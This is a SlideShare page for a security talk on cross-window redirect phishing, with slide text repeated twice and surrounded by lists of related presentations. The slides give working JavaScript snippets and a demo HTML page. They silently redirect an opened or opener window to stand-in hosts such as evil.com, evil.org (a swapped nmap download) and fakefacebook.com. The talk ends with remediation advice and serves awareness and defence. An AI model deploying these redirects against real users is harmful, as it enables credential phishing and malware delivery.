SlideShare a Scribd company logo

CROSS-WINDOW REDIRECT TITLE

Download as PPTX, PDF
Michael Hendrickx
Michael Hendrickx

This document summarizes cross-window redirects, a social engineering technique that exploits opened browser windows using JavaScript. It discusses two variants: child window redirects, where the opened child window redirects the parent, and parent window redirects, where the opened parent window is redirected by the child. It provides examples of how this technique can be used maliciously to redirect users to phishing pages from legitimate sites. The document recommends ways to mitigate this risk, such as not using window.open() to open links and verifying the window opener is trusted.

Technology
1 of 16
Cross Window Redirect Khaled Hawasli Michael Hendrickx
Who are we? • Khaled Hawasli – Manager Security Analysis @ HelpAG • Michael Hendrickx – Security Analyst @ HelpAG
Preface • Social Engineering becomes more sophisticated • People don’t fall for the “click here” trick – Receive email with link – Click link – Presented with login screen
Old tricks • www.facebook.com
Cross-Window Redirect • Exploiting opened windows using JS • Unknowingly hyperlink redirections • Works on all browsers • 2 Variants: – Child window redirect – Parent window redirect
Child window redirect • Control the link you just opened Opens Gmail with window.open() Redirect to fake phishing page Parent Window The attackers site (controlling window) Child Window The targeted site (controlled window) childWindow = window.open(‘https://mail.google.com’); childWindow.location = ‘http://mail.google.com.evil.com/gmail/login.php’; 1 2
X-windows redirect demo • Let’s get malware to users – Let’s watch a movie – We need a movie player http://michaelhendrickx.com/misc/sf.html
X-windows redirect explained • Link to SF to download software – Rewrite the link before the countdown  sf = window.open(‘http://sourceforge.net/...’); setTimeout(function(){ sf.location = ‘http://evil.org/nmap.tar.gz’; }, 4000);
Multiple ways to attack this: • setTimeout(): – Wait for a while and redirect the page. • Interactive(): – Server polling using XHR – Attacker can flip page on demand • HTML5 Visibility API: – Flip page when user is not looking https://github.com/ndrix/xwindow-redirect
Parent Window Redirect • “Evil child” can control the parent 1 Opens website with window.open() Child redirects the parent Parent Window The targeted site (controlled window) Child Window The (co window.open(‘http://mywebsite.com’); window.opener = ‘http://evil.com/gmail/login.php’;
Parent window redirect: demo • Emirates has some crazy deals! (Click Facebook message)
Parent window redirect: demo • Emirates has some crazy deals! <!DOCTYPE html> <head><title>Crazy deals from Emirates.com</title></head> <body> <img src="ek.jpg"/> <script> window.opener.location = 'http://fakefacebook.com’; window.location = 'http://www.emirates.com/ae/…'; </script> </body> </html>
Parent window redirect: demo • User may spend long enough on the target site, believing that Facebook timed out. Parent Window Child Window1. open child with window.open() 2. Redirect facebook to fake “session logged out” 3. refresh itself to legitimate site
Other sites that use window.open() • Facebook, Amazon widget, … • GMail schema.org
Remediation • Don’t use window.open() to open hyperlinks – Those links may control your page • Verify if your page was opened from another page – if(window.opener && !window.opener.closed){ ... } • Preferably, browsers should use X-Frame- Options header for these JS links
Thank you! Any questions?

Recommended

Zero To WordPress Plubish
Zero To WordPress PlubishZero To WordPress Plubish
Zero To WordPress PlubishMichele Butcher-Jones
 
How to hack the web
How to hack the webHow to hack the web
How to hack the webAmy McMullin
 
ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareMichael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Michael Hendrickx
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101Narudom Roongsiriwong, CISSP
 
Securing the Internet from Cyber Criminals
Securing the Internet from Cyber CriminalsSecuring the Internet from Cyber Criminals
Securing the Internet from Cyber CriminalsNarudom Roongsiriwong, CISSP
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 

Recommended

Zero To WordPress Plubish
Zero To WordPress PlubishZero To WordPress Plubish
Zero To WordPress PlubishMichele Butcher-Jones
 
How to hack the web
How to hack the webHow to hack the web
How to hack the webAmy McMullin
 
ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareMichael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Michael Hendrickx
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101Narudom Roongsiriwong, CISSP
 
Securing the Internet from Cyber Criminals
Securing the Internet from Cyber CriminalsSecuring the Internet from Cyber Criminals
Securing the Internet from Cyber CriminalsNarudom Roongsiriwong, CISSP
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
Introduction to jQuery Mobile
Introduction to jQuery MobileIntroduction to jQuery Mobile
Introduction to jQuery MobileDavid Hudson
 
Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)Thinkful
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Ivo Andreev
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comesKrzysztof Kotowicz
 
Web works hol
Web works holWeb works hol
Web works holmomoahmedabad
 
Responsive websites. Toolbox
Responsive websites. ToolboxResponsive websites. Toolbox
Responsive websites. ToolboxWojtek Zając
 
02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptxssuserec53e73
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid ThemSiteGround.com
 
Selenium WebDriver
Selenium WebDriverSelenium WebDriver
Selenium WebDriverRajathi-QA
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_securityMichael Freyberger
 
WordPress Security
WordPress SecurityWordPress Security
WordPress SecurityIvan Storck
 
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)Thinkful
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid ThemDaniel Kanchev
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)PacSecJP
 
15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.pptshatrutrial44
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Brian Layman
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik
 
Chapter 13 web security
Chapter 13 web securityChapter 13 web security
Chapter 13 web securitynewbie2019
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefDefconRussia
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 

More Related Content

Similar to CROSS-WINDOW REDIRECT TITLE

Introduction to jQuery Mobile
Introduction to jQuery MobileIntroduction to jQuery Mobile
Introduction to jQuery MobileDavid Hudson
 
Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)Thinkful
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Ivo Andreev
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comesKrzysztof Kotowicz
 
Responsive websites. Toolbox
Responsive websites. ToolboxResponsive websites. Toolbox
Responsive websites. ToolboxWojtek Zając
 
02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptxssuserec53e73
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid ThemSiteGround.com
 
Selenium WebDriver
Selenium WebDriverSelenium WebDriver
Selenium WebDriverRajathi-QA
 
WordPress Security
WordPress SecurityWordPress Security
WordPress SecurityIvan Storck
 
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)Thinkful
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid ThemDaniel Kanchev
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)PacSecJP
 
15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.pptshatrutrial44
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Brian Layman
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik
 
Chapter 13 web security
Chapter 13 web securityChapter 13 web security
Chapter 13 web securitynewbie2019
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefDefconRussia
 

Similar to CROSS-WINDOW REDIRECT TITLE (20)

Introduction to jQuery Mobile
Introduction to jQuery MobileIntroduction to jQuery Mobile
Introduction to jQuery Mobile
 
Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)Web app with j query &amp; javascript (5:4)
Web app with j query &amp; javascript (5:4)
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
 
Web works hol
Web works holWeb works hol
Web works hol
 
Responsive websites. Toolbox
Responsive websites. ToolboxResponsive websites. Toolbox
Responsive websites. Toolbox
 
02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them
 
Selenium WebDriver
Selenium WebDriverSelenium WebDriver
Selenium WebDriver
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
 
WordPress Security
WordPress SecurityWordPress Security
WordPress Security
 
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
Build a Web App with JavaScript and jQuery (5:18:17, Los Angeles)
 
8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them8 Most Common Joomla! Hacks and How to Avoid Them
8 Most Common Joomla! Hacks and How to Avoid Them
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
 
15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
Chapter 13 web security
Chapter 13 web securityChapter 13 web security
Chapter 13 web security
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
 

Recently uploaded

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 

CROSS-WINDOW REDIRECT TITLE

  • 1. Cross Window Redirect Khaled Hawasli Michael Hendrickx
  • 2. Who are we? • Khaled Hawasli – Manager Security Analysis @ HelpAG • Michael Hendrickx – Security Analyst @ HelpAG
  • 3. Preface • Social Engineering becomes more sophisticated • People don’t fall for the “click here” trick – Receive email with link – Click link – Presented with login screen
  • 5. Cross-Window Redirect • Exploiting opened windows using JS • Unknowingly hyperlink redirections • Works on all browsers • 2 Variants: – Child window redirect – Parent window redirect
  • 6. Child window redirect • Control the link you just opened Opens Gmail with window.open() Redirect to fake phishing page Parent Window The attackers site (controlling window) Child Window The targeted site (controlled window) childWindow = window.open(‘https://mail.google.com’); childWindow.location = ‘http://mail.google.com.evil.com/gmail/login.php’; 1 2
  • 7. X-windows redirect demo • Let’s get malware to users – Let’s watch a movie – We need a movie player http://michaelhendrickx.com/misc/sf.html
  • 8. X-windows redirect explained • Link to SF to download software – Rewrite the link before the countdown  sf = window.open(‘http://sourceforge.net/...’); setTimeout(function(){ sf.location = ‘http://evil.org/nmap.tar.gz’; }, 4000);
  • 9. Multiple ways to attack this: • setTimeout(): – Wait for a while and redirect the page. • Interactive(): – Server polling using XHR – Attacker can flip page on demand • HTML5 Visibility API: – Flip page when user is not looking https://github.com/ndrix/xwindow-redirect
  • 10. Parent Window Redirect • “Evil child” can control the parent 1 Opens website with window.open() Child redirects the parent Parent Window The targeted site (controlled window) Child Window The (co window.open(‘http://mywebsite.com’); window.opener = ‘http://evil.com/gmail/login.php’;
  • 11. Parent window redirect: demo • Emirates has some crazy deals! (Click Facebook message)
  • 12. Parent window redirect: demo • Emirates has some crazy deals! <!DOCTYPE html> <head><title>Crazy deals from Emirates.com</title></head> <body> <img src="ek.jpg"/> <script> window.opener.location = 'http://fakefacebook.com’; window.location = 'http://www.emirates.com/ae/…'; </script> </body> </html>
  • 13. Parent window redirect: demo • User may spend long enough on the target site, believing that Facebook timed out. Parent Window Child Window1. open child with window.open() 2. Redirect facebook to fake “session logged out” 3. refresh itself to legitimate site
  • 14. Other sites that use window.open() • Facebook, Amazon widget, … • GMail schema.org
  • 15. Remediation • Don’t use window.open() to open hyperlinks – Those links may control your page • Verify if your page was opened from another page – if(window.opener && !window.opener.closed){ ... } • Preferably, browsers should use X-Frame- Options header for these JS links